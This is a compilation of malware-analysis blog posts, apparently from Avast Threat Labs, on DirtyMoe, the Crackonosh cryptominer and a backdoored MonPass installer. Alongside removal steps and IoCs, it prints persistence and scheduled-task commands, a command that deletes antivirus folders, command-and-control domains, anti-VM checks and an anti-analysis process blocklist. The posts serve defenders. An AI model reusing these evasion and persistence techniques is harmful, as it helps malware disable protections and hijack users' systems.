Every good malware implements a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. DirtyMoe uses rootkit methods to hide system activities. Obfuscation is implemented via the VMProtect software and via its own encryption/decryption algorithm. Network communication uses a multilevel architecture so that no IP addresses of the mother servers are hardcoded. Last but not least, the DirtyMoe processes protect each other.

4.1 DirtyMoe Driver

 The DirtyMoe driver provides a wide scale of functionality; see the following shortlist:

  • Minifilter: manipulation (hiding, inserting, modifying entries) of directory enumeration
  • Registry Hiding: can hide defined registry keys
  • Service Hiding: patches services.exe structures to hide a given service
  • Driver Hiding: can hide itself in the system

The DirtyMoe driver is a broad topic that we will discuss in a future post.

4.2 Obfuscation and VMProtect

The DirtyMoe code contains many malicious patterns that would be caught by most AVs. The malware authors used VMProtect to obfuscate the DirtyMoe Service DLL file. Downloaded MOE objects are encrypted with a symmetric cipher using hardcoded keys. We have seen several MOE objects which contained, in essence, the same PE files differing only in their PE headers. Nevertheless, even these slight modifications were enough for the cipher to produce completely different MOE objects. Therefore, static detection cannot be applied to encrypted MOE objects. Moreover, DirtyMoe does not dump a decrypted MOE object (PE file) to the file system but injects it directly into memory.

DirtyMoe stores its configuration in the following registry key: HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D

The configuration values are also encrypted with a symmetric cipher and a hardcoded key. Figure 9 demonstrates the decryption method for the DirectPlay8\Direct3D registry key. A detailed explanation of the method will be published in a future post.

Figure 9. Decryption method for the Direct3D registry value

4.3 Anti-Forensic and Protections

As we mentioned in the Exploitation section, forensic and tracking methods are complicated by the fact that the DirtyMoe workers are started across several processes and threads. The workers are initially run as svchost.exe, but the DirtyMoe driver changes the workers' process names to fontdrvhost.exe. DirtyMoe has two worker processes (Core and Executioner) that guard each other: if the first worker is killed, the second one starts a new instance of the first, and vice versa.

5. Symptoms and Deactivation

Although DirtyMoe uses advanced protection and anti-forensics techniques, several symptoms indicate the presence of DirtyMoe.

5.1 Registry

A telltale indicator of DirtyMoe's presence is the registry key HKLM\SOFTWARE\Microsoft\DirectPlay8\Direct3D, in which DirtyMoe stores its configuration.

Additionally, if the system registry contains duplicate keys under HKLM\SYSTEM\CurrentControlSet\Services, it can point to unauthorized manipulation of the Windows kernel structures. The DirtyMoe driver implements registry-hiding techniques that can cause such inconsistencies in the registry.

The MSI installer leaves the following flag if the installation is successful:

5.2 Files

The working directory of DirtyMoe is C:\Windows\AppPatch. The DirtyMoe malware backs up the original SENS DLL file to the working directory as Acpsens.dll.

Rarely, the DirtyMoe worker fails during .moe file injection, and the C:\Windows\AppPatch\Custom folder may contain unprocessed MOE files.

Sometimes, DirtyMoe “forgets” to delete a temporary DLL file used for the malware deployment. The temporary service is present in Windows services, and the service name pattern is ms<five-digit_random_number>app. So, the System32 folder can contain the DLL file in the form C:\Windows\System32\ms<five-digit-random-number>app.dll.

The MSI installer often creates a directory in C:\Program Files folder with the name of the MSI product name:

5.3 Processes

On Windows 10, the DirtyMoe processes have no live parent process, since the parent is killed for anti-tracking purposes. The workers are based on svchost.exe. Nonetheless, the processes are visible as fontdrvhost.exe under the SYSTEM user, with the following command-line arguments:

svchost.exe -k LocalService
svchost.exe -k NetworkService

5.4 Deactivation

It is necessary to stop or delete the DirtyMoe service named Ms<volume-id>App. Unfortunately, the DirtyMoe driver hides the service even in safe mode. So, the system should be booted from an installation disk to avoid the driver's effects, and the service DLL file located at C:\Windows\System32\Ms<volume-id>App.dll should then be removed or renamed.

After that, the DirtyMoe service will not start, and the following actions can be taken:

  • Remove Ms<volume-id>App service
  • Delete the service DLL file
  • Remove the core payload and their backup files from C:\Windows\AppPatch
    • Ke<five-digit_random_number>.xsl and Ac<volume-id>.sdb
  • Remove DirtyMoe Objects from C:\Windows\AppPatch\Custom
    • <md5>.mos; <md5>.moe; <md5>.mow

6. Discussion

Parts of the DirtyMoe malware have been seen throughout the last four years. Most notably, NSFOCUS Technologies described these parts as Nugget Phantom [1]. However, DirtyMoe needs an exploit kit for its deployment. We have clues that PurpleFox [5] and DirtyMoe are related. The open question is whether PurpleFox and DirtyMoe are run by different malware groups, whether PurpleFox is being paid to distribute DirtyMoe, or whether both families come from the same factory. Both have complex and sophisticated network infrastructures, so the malware could well be the work of the same group.

The DirtyMoe authors are probably from China. The DirtyMoe service and MOE modules are written in Delphi, while the DirtyMoe driver is written in Microsoft Visual C++. However, the driver is composed of rootkit techniques that are freely accessible on the internet. The authors do not seem to be experienced rootkit writers, since the driver code contains many bugs and appears to have been copied from the internet. Moreover, Delphi malicious patterns would be easily detectable, so the authors have been using VMProtect for code obfuscation.

The incidence of PurpleFox and DirtyMoe has increased by an order of magnitude in the last year, and the expected trend indicates that DirtyMoe is and will remain very active. Furthermore, the malware authors seem to be a large and organized group. Therefore, DirtyMoe should be closely monitored.

7. Conclusion

Cryptojacking and DDoS attacks are still popular methods, and our findings indicate that DirtyMoe is still active and on the rise. DirtyMoe is a complex piece of malware that has been designed as a modular system. PurpleFox is one of the exploit kits most used for DirtyMoe deployment. DirtyMoe can execute arbitrary functionality based on a loaded MOE object, such as DDoS attacks, meaning that it can do basically anything. In the meantime, the malware focuses on crypto-mining.

The malware implements many self-defense and hiding techniques applied at the local, network, and kernel layers. Communication with C&C servers is based on DNS requests and uses a special mechanism for translating DNS results to real IP addresses. Therefore, blocking the C&C servers is not an easy task, since the C&C addresses are different each time and are not hardcoded.

Both PurpleFox and DirtyMoe are still active and gaining strength. Attacks performed by PurpleFox increased significantly in 2020, and the number of DirtyMoe hits has risen similarly, since the two are clearly linked. We have registered approx. 100k infected computers to date. Furthermore, one MOE object aims to worm its way into other machines, so PurpleFox and DirtyMoe will certainly increase their activity. Therefore, both should be closely monitored for the time being.

This article summarizes the DirtyMoe malware from a high-level perspective. We described the deployment, installation, purpose, communication, self-protection, and statistics of DirtyMoe in general. The following articles in the DirtyMoe series will give a detailed description of the MSI installer package, the DirtyMoe driver, services, MOE objects, and other interesting topics related to the whole DirtyMoe architecture.


[1] Nugget Phantom Analysis
[2] Purple Fox Rootkit Now Propagates as a Worm
[3] EternalBlue Still Relevant
[4] Scripting Engine Memory Corruption Vulnerability
[5] Purple Fox malware

The post DirtyMoe: Introduction and General Overview of Modularized Malware appeared first on Avast Threat Labs.

Crackonosh: A New Malware Distributed in Cracked Software

24 June 2021 at 09:39

We recently became aware of customer reports advising that Avast antivirus was missing from their systems – like the following example from Reddit.

From Reddit

We looked into this report and others like it and have found a new malware we’re calling “Crackonosh” in part because of some possible indications that the malware author may be Czech. Crackonosh is distributed along with illegal, cracked copies of popular software and searches for and disables many popular antivirus programs as part of its anti-detection and anti-forensics tactics.

In this posting we analyze Crackonosh. We look first at how Crackonosh is installed. In our analysis we found that it drops three key files winrmsrv.exe, winscomrssrv.dll and winlogui.exe which we analyze below. We also include information on the steps it takes to disable Windows Defender and Windows Update as well as anti-detection and anti-forensics actions. We include information on how to remove Crackonosh. Finally, we include indicators of compromise for Crackonosh.

Number of hits since December 2020. In total over 222,000 unique devices.
Number of users infected by Crackonosh since December 2020. In May it is still about a thousand hits every day.

The main purpose of Crackonosh is to install the coinminer XMRig. Of all the wallets we found, one had publicly visible statistics: the pool sites showed payments of 9,000 XMR in total, which at today's prices is over $2,000,000 USD.

Statistics from MoneroHash

Installation of Crackonosh

The diagram below depicts the entire Crackonosh installation process.

Diagram of installation
  1. First, the victim runs the installer for the cracked software.
  2. The installer runs maintenance.vbs
  3. Maintenance.vbs then starts the installation using serviceinstaller.msi
  4. Serviceinstaller.msi registers and runs serviceinstaller.exe, the main malware executable.
  5. Serviceinstaller.exe drops StartupCheckLibrary.DLL.
  6. StartupCheckLibrary.DLL downloads and runs wksprtcli.dll.
  7. Wksprtcli.dll extracts newer winlogui.exe and drops winscomrssrv.dll and winrmsrv.exe which it contains, decrypts and places in the folder.

From the original compilation dates we identified 30 different versions of serviceinstaller.exe, the main malware executable, from 31.1.2018 up to 23.11.2020. It is easy to see that serviceinstaller.exe is started from a registry key created by maintenance.vbs.

The only clue about what happens before maintenance.vbs creates this registry key, and how the files appear on the victim's computer, is the removal of the InstallWinSAT task in maintenance.vbs. Hunting led us to uncover uninstallation logs containing Crackonosh unpacking details from installations with cracked software.

The following strings were found in uninstallation logs:

  • {sys}\7z.exe
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg3.scs" -o{sys}
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg4.scs" -o{localappdata}\Programs\Common
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Maintenance\InstallWinSAT" /TR Maintenance.vbs /RL HIGHEST /F
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Application Experience\StartupCheckLibrary" /TR StartupCheck.vbs /RL HIGHEST /F

This shows us that Crackonosh was packed in a password protected archive and unpacked in the process of installation. Here are infected installers we found:

Name of infected installer SHA256
NBA 2K19 E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF
Grand Theft Auto V 65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A
Far Cry 5 4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71
The Sims 4 Seasons 7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4
Euro Truck Simulator 2 93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0
The Sims 4 9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3
Jurassic World Evolution D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A
Fallout 4 GOTY 6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584
Call of Cthulhu D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB
Pro Evolution Soccer 2018 8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05
We Happy Few C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1
Infected installers

The Inno Setup installer executes the following script. If it finds it is “safe” to run the malware, it installs the Crackonosh malware to %SystemRoot%\system32\ and one configuration file to %localappdata%\Programs\Common, and creates two tasks in the Windows Task Scheduler: InstallWinSAT to start maintenance.vbs and StartupCheckLibrary to start StartupCheckLibrary.vbs. Otherwise, it does nothing at all.

Reconstructed Crackonosh Inno Setup installer script

Installation script

Analysis of Maintenance.vbs

As noted before, the Crackonosh installer registers the maintenance.vbs script with the Windows Task Scheduler and sets it to run on system startup. Maintenance.vbs creates a counter that counts system startups until it reaches the 7th or 10th system start, depending on the version. After that, maintenance.vbs runs serviceinstaller.msi, disables hibernation mode on the infected system, and sets the system to boot into safe mode on the next restart. To cover its tracks, it also deletes serviceinstaller.msi and maintenance.vbs.

Below is the maintenance.vbs script:


Serviceinstaller.msi does not manipulate any files on the system, it only modifies the registry to register serviceinstaller.exe, the main malware executable, as a service and allows it to run in safe mode. Below you can see the registry entries serviceinstaller.msi makes.

MSI Viewer screenshot of serviceinstaller.msi

Using Safe Mode to Disable Windows Defender and Antivirus

While a Windows system is in safe mode, antivirus software doesn't run. This enables the malicious serviceinstaller.exe to easily disable and delete Windows Defender. It also uses WQL to query all installed antivirus software: SELECT * FROM AntiVirusProduct. If it finds any of the following antivirus products, it deletes them with the command rd <AV directory> /s /q, where <AV directory> is the default directory name the specific antivirus product uses.

  • Adaware
  • Bitdefender
  • Escan
  • F-secure
  • Kaspersky
  • Mcafee (scanner only)
  • Norton
  • Panda

It contains the names of the folders where these products are installed, and finally it deletes %PUBLIC%\Desktop\.

Older versions of serviceinstaller.exe used pathToSignedProductExe to obtain the containing folder. This folder was then deleted. This way Crackonosh could delete older versions of Avast or current versions with Self-Defense turned off.

It also drops StartupCheckLibrary.dll and winlogui.exe to %SystemRoot%\system32\ folder.

In older versions, serviceinstaller.exe dropped windfn.exe, which was responsible for dropping and executing winlogui.exe. Winlogui.exe contains the XMRig coinminer; in newer versions serviceinstaller drops winlogui directly and creates the following registry entry:

This connects the infected PC to the mining pool on every start.

Disabling Windows Defender and Windows Update

It deletes following registry entries to stop Windows Defender and turn off automatic updates.

commands executed by serviceinstaller.exe

In place of Windows Defender, it installs its own MSASCuiL.exe, which puts the Windows Security icon in the system tray.

It has the right icon
Deleted Defender

Searching for Configuration Files 

Looking at the behavior of winrmsrv.exe (aaf2770f78a3d3ec237ca14e0cb20f4a05273ead04169342ddb989431c537e83) revealed something interesting in its API calls: there were over a thousand calls to FindFirstFileExW and FindNextFileExW. We looked at what file it was searching for; unfortunately, the malware author hid the name of the file behind a SHA256 hash, as shown below.

In this image, you see the function searching for a file by hash of file name from winrmsrv.exe. Some nodes are grouped for better readability.

This technique was used in other parts of Crackonosh, sometimes with SHA1. 

Here is a list of searched hashes and corresponding names and paths. In the case of UserAccountControlSettingsDevice.dat the search is also done recursively in all subfolders. 

    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
      • SHA1: F3764EC8078B4524428A8FC8119946F8E8D99A27
      • SHA256: 86CC68FBF440D4C61EEC18B08E817BB2C0C52B307E673AE3FFB91ED6E129B273
    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
      • SHA1: 1063489F4BDD043F72F1BED6FA03086AD1D1DE20
      • SHA256: 1A57A37EB4CD23813A25C131F3C6872ED175ABB6F1525F2FE15CFF4C077D5DF7
  • Searched in CSIDL_Profile and actual location is %localappdata%\Programs\Common
    • File UserAccountControlSettingsDevice.dat
      • SHA1: B53B0887B5FD97E3247D7D88D4369BFC449585C5
      • SHA256: 7BB5328FB53B5CD59046580C3756F736688CD298FE8846169F3C75F3526D3DA5

These files contain configuration information encrypted with an XOR cipher, with the keys stored in the executables.

After decryption we found names of other parts of malware, some URLs, RSA public keys, communication keys for winrmsrv.exe and commands for XMRig. RSA keys are 8192 and 8912 bits long. These keys are used to verify every file downloaded by Crackonosh (via StartupCheckLibrary.dll, winrmsrv.exe, winscomrssrv.dll).
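A repeating-key XOR decryption of such a config file might look like this minimal sketch; the key here is made up, since the real keys are hardcoded in the executables.

```python
from itertools import cycle

def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR over the config blob. XOR is symmetric,
    so the same function both encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))
```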

Here we found the first mention of wksprtcli.dll.

StartupCheckLibrary.dll and Download of wksprtcli.dll

StartupCheckLibrary.dll is the way the author of Crackonosh can download updates of Crackonosh to infected machines. StartupCheckLibrary.dll queries TXT DNS records for the domains first[.]universalwebsolutions[.]info and second[.]universalwebsolutions[.]info (or other TLDs like getnewupdatesdownload[.]net and webpublicservices[.]org). There are TXT DNS records like [email protected]@@FEpHw7Hn33. From the first twelve letters it computes the IP address, as shown in the image below. The next five characters are the digits of the port, encrypted by adding 16 to each character. This gives us a socket from which to download wksprtcli.dll. The last eight characters are the version. Downloaded data is validated against one of the public keys stored in the config file.

Decryption of IP address, screenshot from Ida
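The field layout of such a TXT record can be sketched as follows. The IP decoding itself is only shown in the screenshot, so this sketch leaves the first twelve characters encrypted and only decodes the port (each digit's character code increased by 16) and the version; the sample record in the test is made up.

```python
def parse_txt_record(record: str) -> tuple[str, int, str]:
    """Split a Crackonosh update TXT record into its three fields:
    12 encrypted IP characters, 5 encrypted port digits, 8 version chars."""
    ip_part, port_part, version = record[:12], record[12:17], record[17:25]
    # each port digit was encrypted by adding 16 to its character code
    port = int("".join(chr(ord(c) - 16) for c in port_part))
    return ip_part, port, version
```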

Wksprtcli.dll (exports DllGetClassObjectMain) updates older versions of Crackonosh. The oldest version of wksprtcli.dll that we found checks only for the nonexistence of winlogui.exe; it then deletes diskdriver.exe (a previous coinminer) and its autostart registry entry. The newest version runs only within a certain time frame. It deletes older versions of winlogui.exe or diskdriver.exe and drops a new version of winlogui.exe. It drops new config files and installs winrmsrv.exe and winscomrssrv.dll. It also changed the way winlogui.exe is started, from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to a task scheduled on user login.

Tasks created in Windows task scheduler by wksprtcli.dll

Finally, it disables hibernation and Windows Defender.

Wksprtcli.dll also checks the computer time, probably to avoid overwriting newer versions and to make dynamic analysis harder. It also has a hardcoded date after which it stops the winlogui task so that it can replace the files.

File hash (time of compilation) | Timestamp 1 (after this, it kills the winlogui task so it can update it) | Timestamp 2 (before this, it runs)
5C8B… (2020-11-20) | 2019-12-01 | 2023-12-30
D9EE… (2019-11-24) | 2019-12-01 | 2020-12-06
194A… (2019-11-24) | 2019-03-09 | n/a
FA87… (2019-03-22) | uses winlogui size instead | 2019-11-02
C234… (2019-02-24) | 2019-03-09 | 2019-11-02
A2D0… (2018-12-27) | n/a | n/a
D3DD… (2018-10-13) | n/a | n/a
Hardcoded timestamps; full file hashes are in the IoCs

Analysis of Winrmsrv.exe

Winrmsrv.exe is responsible for P2P connections between infected machines. It exchanges version info and is able to download newer versions of Crackonosh. We didn't find any evidence of versions higher than 0, and therefore we don't know what files are transferred.

Winrmsrv.exe checks for an internet connection. If it succeeds, it derives three different ports in the following way.

The config file defines an offset (49863) and a range (33575). For every port, SHA-256 is computed from the date (days since the Unix epoch) and 10 bytes from the config file. Each port is then set to the offset plus the first word of the hash modulo the range (offset + (2 B of SHA % range)).

The first two ports are used for incoming TCP connections. The last one is used to listen for incoming UDP.

Obtain ports, screenshot from IDA

Next, winrmsrv.exe starts sending UDP packets containing the version and a timestamp to random IP addresses on the third port (approximately 10 IPs per second). Each packet is padded with random bytes (to a random length) and encrypted with a Vigenère cipher.

UDP packet
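A byte-wise Vigenère over the packet body could look like this sketch. The key here is made up (the real one comes from the config file), and padding with random bytes to a random length would happen before encryption so that packet sizes carry no signal.

```python
from itertools import cycle

def vigenere_encrypt(data: bytes, key: bytes) -> bytes:
    """Byte-wise Vigenère: add the corresponding key byte mod 256."""
    return bytes((b + k) % 256 for b, k in zip(data, cycle(key)))

def vigenere_decrypt(data: bytes, key: bytes) -> bytes:
    """Inverse operation: subtract the key byte mod 256."""
    return bytes((b - k) % 256 for b, k in zip(data, cycle(key)))
```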

Finally, if winrmsrv.exe finds an IP address infected with Crackonosh, it stores the IP, compares versions, and the newer installation updates the older one. The update data is signed with the private key. On the next start, winrmsrv.exe contacts all stored IPs to check their versions before trying new ones. It blocks all IP addresses after the communication: for 4 hours normally, or permanently (until restart) if they did not follow the protocol.

We have modified masscan to check this protocol. It showed about 370 infected IP addresses over the internet (IPv4).

A UDP Hello B
  • A sends a UDP packet from a random port to B's port 3; B decrypts it, checks the timestamp (within the last 15 s), and if the versions match, bans the IP address for the next 4 hours
  • B sends a UDP Crackonosh Hello packet to A's port; A decrypts it and checks the timestamp: same version: do nothing; B has a lower version: TCP send; B has a higher version: TCP receive
A TCP Send B
  • A connects to B's port 2; B checks whether the communication from A is expected (a successful UDP Hello in the last 5 seconds with different versions)
  • A sends an encrypted packet; B decodes the data, validates it, and saves it
A TCP Receive B
  • A connects to B's port 1; B checks whether the communication from A is expected (a successful UDP Hello in the last 5 seconds with different versions)
  • B sends an encrypted packet; A decodes the data, validates it, and saves it
Communication diagram
Encryption scheme of the UDP Packet
Encryption scheme of the TCP Packet

Notably, there is a mistake in the TCP encryption/decryption implementation shown above. In place of the red arrow, one more SHA256 is computed, which should be used in the XOR with the initialization vector; however, the input of that SHA is used instead of its result.

Analysis of winscomrssrv.dll

It is preparation for the next phase. It uses TXT DNS records in the same way as StartupCheckLibrary.dll. It tries to decode TXT records at the following domains:

  • fgh[.]roboticseldomfutures[.]info
  • anter[.]roboticseldomfutures[.]info
  • any[.]tshirtcheapbusiness[.]net
  • lef[.]loadtubevideos[.]com
  • levi[.]loadtubevideos[.]com
  • gof[.]planetgoodimages[.]info
  • dus[.]bridgetowncityphotos[.]org
  • ofl[.]bridgetowncityphotos[.]org
  • duo[.]motortestingpublic[.]com
  • asw[.]animegogofilms[.]info
  • wc[.]animegogofilms[.]info
  • enu[.]andromediacenter[.]net
  • dnn[.]duckduckanimesdownload[.]net
  • vfog[.]duckduckanimesdownload[.]net
  • sto[.]genomdevelsites[.]org
  • sc[.]stocktradingservices[.]org
  • ali[.]stocktradingservices[.]org
  • fgo[.]darestopedunno[.]com
  • dvd[.]computerpartservices[.]info
  • efco[.]computerpartservices[.]info
  • plo[.]antropoledia[.]info
  • lp[.]junglewearshirts[.]net
  • um[.]junglewearshirts[.]net
  • fri[.]rainbowobservehome[.]net
  • internal[.]videoservicesxvid[.]com
  • daci[.]videoservicesxvid[.]com
  • dow[.]moonexploringfromhome[.]info
  • net[.]todayaniversarygifts[.]info
  • sego[.]todayaniversarygifts[.]info
  • pol[.]motorcyclesonthehighway[.]com
  • any[.]andycopyprinter[.]net
  • onl[.]andycopyprinter[.]net
  • cvh[.]cheapjewelleryathome[.]info
  • df[.]dvdstoreshopper[.]org
  • efr[.]dvdstoreshopper[.]org
  • Sdf[.]expensivecarshomerepair[.]com

It seems that these files are not yet in the wild, but we know what the file names should be:

C:\WINDOWS\System32\wrsrvrcomd0.dll, C:\WINDOWS\System32\winupdtemp_0.dat and C:\WINDOWS\System32\winuptddm0.

Anti-Detection and Anti-Forensics

As noted before, Crackonosh takes specific actions to evade security software and analysis.

Specific actions it takes to evade and disable security software includes:

  • Deleting antivirus software in safe mode
  • Stopping Windows Update
  • Replacing Windows Security with green tick system tray icon
  • Using libraries that are not started through the usual DllMain entry point (used when a library is run as the main executable, e.g. by rundll32.exe), but instead through other exported functions
  • Serviceinstaller tests if it is running in Safe mode

To protect against analysis, it takes the following actions to test to determine if it’s running in a VM:

  • Checks registry keys:
    • SOFTWARE\VMware, Inc
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters
    • SOFTWARE\Oracle\VirtualBox Guest Additions
  • Tests whether the computer time falls within a reasonable interval, i.e. after the creation of the malware and before 2023 (wksprtcli.dll)
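The time-window check can be sketched as follows. Both boundary dates are illustrative assumptions: the analysis only states that the window spans from the malware's creation until 2023, not the exact hard-coded values.

```python
from datetime import datetime

# Illustrative assumptions, not the sample's real constants:
NOT_BEFORE = datetime(2018, 6, 10)   # stands in for the malware's creation date
NOT_AFTER = datetime(2023, 1, 1)     # upper bound mentioned in the analysis

def system_time_is_plausible(now):
    # wksprtcli.dll only proceeds when the clock falls inside this window;
    # anything else suggests an analysis machine with a skewed clock.
    return NOT_BEFORE <= now < NOT_AFTER
```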

Also, as noted, it delays running to better hide itself. We found that the specific installers use hard-coded dates and times for this delay, as shown below.

SHA of installer Installer doesn’t run before
9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3 2018-06-10 13:08:20
8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05 2018-06-19 14:06:37
93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0 2018-07-04 17:33:20
6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584 2018-07-10 15:35:57
4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71 2018-07-25 13:56:35
65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A 2018-08-03 15:50:40
C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1 2018-08-14 12:36:30
7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4 2018-09-13 12:29:50
D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A 2018-10-01 13:52:22
E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF 2018-10-19 14:15:35
D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB 2018-11-07 12:47:30
Hardcoded timestamps in installers

We also found a version, winrmsrv.exe (5B85CEB558BAADED794E4DB8B8279E2AC42405896B143A63F8A334E6C6BBA3FB), that instead decrypts a time hard-coded in a config file (for example, in 5AB27EAB926755620C948E7F7A1FDC957C657AEB285F449A4A32EF8B1ADD92AC it is 2020-02-03). If the current system time is lower than the extracted value, winrmsrv.exe doesn't run.

It also takes specific actions to hide itself from possible power users who use tools that could disclose its presence.

It uses Windows-like names and descriptions such as winlogui.exe which is the Windows Logon GUI Application.

It also checks running processes and compares them to the blocklist below. If winrmsrv.exe or winlogui.exe finds a process with one of the specified names, it terminates itself and waits until the next start of the PC.

  • Blocklist:
    • dumpcap.exe
    • fiddler.exe 
    • frst.exe 
    • frst64.exe 
    • fse2.exe 
    • mbar.exe 
    • messageanalyzer.exe 
    • netmon.exe 
    • networkminer.exe 
    • ollydbg.exe 
    • procdump.exe 
    • procdump64.exe 
    • procexp.exe 
    • procexp64.exe 
    • procmon.exe 
    • procmon64.exe 
    • rawshark.exe 
    • rootkitremover.exe 
    • sdscan.exe 
    • sdwelcome.exe 
    • splunk.exe 
    • splunkd.exe 
    • spyhunter4.exe 
    • taskmgr.exe
    • tshark.exe 
    • windbg.exe 
    • wireshark-gtk.exe 
    • wireshark.exe 
    • x32dbg.exe 
    • x64dbg.exe 
    • x96dbg.exe
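The check itself reduces to a case-insensitive name comparison against the list above; a minimal sketch (the process enumeration itself is omitted, and the set is abbreviated here):

```python
# Abbreviated blocklist; the full list appears above.
BLOCKLIST = {
    "dumpcap.exe", "fiddler.exe", "ollydbg.exe", "procmon.exe",
    "procexp.exe", "taskmgr.exe", "tshark.exe", "wireshark.exe",
    "windbg.exe", "x32dbg.exe", "x64dbg.exe", "x96dbg.exe",
}

def should_terminate(running_processes):
    # Case-insensitive match, since Windows process names are not case-sensitive.
    return any(name.lower() in BLOCKLIST for name in running_processes)
```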

Additional files

In addition to the components previously discussed, our research found these additional files:

  • Startupcheck.vbs: a one time script to create a Windows Task Scheduler task for StartUpCheckLibrary.dll.
  • Winlogui.dat, wslogon???.dat: temporary files to be moved as new winlogui.exe.
  • Perfdish001.dat: a list of infected IP addresses winrmsrv.exe found.
  • Install.msi and Install.vbs: these are in some versions a step between maintenance.vbs and serviceinstaller.msi, containing commands that are otherwise in maintenance.vbs.

Removal of Crackonosh

Based on our analysis, the following steps are required to fully remove Crackonosh.

Delete the following Scheduled Tasks (Task Schedulers)

  • Microsoft\Windows\Maintenance\InstallWinSAT
  • Microsoft\Windows\Application Experience\StartupCheckLibrary
  • Microsoft\Windows\WDI\SrvHost\
  • Microsoft\Windows\Wininet\Winlogui\
  • Microsoft\Windows\Windows Error Reporting\winrmsrv\

Delete the following files from c:\Windows\system32\

  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
  • 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
  • diskdriver.exe
  • maintenance.vbs
  • serviceinstaller.exe
  • serviceinstaller.msi
  • startupcheck.vbs
  • startupchecklibrary.dll
  • windfn.exe
  • winlogui.exe
  • winrmsrv.exe
  • winscomrssrv.dll
  • wksprtcli.dll

Delete the following file from C:\Documents and Settings\All Users\Local Settings\Application Data\Programs\Common (%localappdata%\Programs\Common)

  • UserAccountControlSettingsDevice.dat

Delete the following file from C:\Program Files\Windows Defender\

  • MSASCuiL.exe

Delete the following Windows registry keys (using regedit.exe)

  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender value DisableAntiSpyware
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableBehaviorMonitoring
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableOnAccessProtection
  • HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection value DisableScanOnRealtimeEnable
  • HKLM\SOFTWARE\Microsoft\Security Center value AntiVirusDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value FirewallDisableNotify
  • HKLM\SOFTWARE\Microsoft\Security Center value UpdatesDisableNotify
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer value HideSCAHealth
  • HKLM\SOFTWARE\Microsoft\Windows Defender\Reporting value DisableEnhancedNotifications
  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value winlogui

Restore the following default Windows services (note: the exact set depends on your OS version):

  • wuauserv
  • SecurityHealthService
  • WinDefend
  • Sense
  • MsMpSvc

Reinstall Windows Defender and any third-party security software, if any was installed.

Error messages

On infected machines, sometimes the following error messages about the file Maintenance.vbs can appear.

Type Mismatch: ‘CInt’, Code: 800A000D
Can not find script file

Both of these are bugs in the Crackonosh installation.

Although there are some guides on the internet on how to resolve these errors, instead we recommend following the steps in the previous chapter to be sure you fully remove all traces of Crackonosh.


Crackonosh installs itself by replacing critical Windows system files and abusing the Windows Safe mode to impair system defenses.

This malware further protects itself by disabling security software, operating system updates and employs other anti-analysis techniques to prevent discovery, making it very difficult to detect and remove.

In summary, Crackonosh shows the risks in downloading cracked software and demonstrates that it is highly profitable for attackers. Crackonosh has been circulating since at least June 2018 and has yielded over $2,000,000 USD for its authors in Monero from over 222,000 infected systems worldwide.

As long as people continue to download cracked software, attacks like these will continue to be profitable for attackers. The key take-away from this is that you really can’t get something for nothing and when you try to steal software, odds are someone is trying to steal from you.

Indicators of Compromise (IoCs)

Public keys


The post Crackonosh: A New Malware Distributed in Cracked Software appeared first on Avast Threat Labs.

Backdoored Client from Mongolian CA MonPass


We discovered an installer downloaded from the official website of MonPass, a major certification authority (CA) in Mongolia in East Asia that was backdoored with Cobalt Strike binaries. We immediately notified MonPass on 22 April 2021 of our findings and encouraged them to address their compromised server and notify those who downloaded the backdoored client.

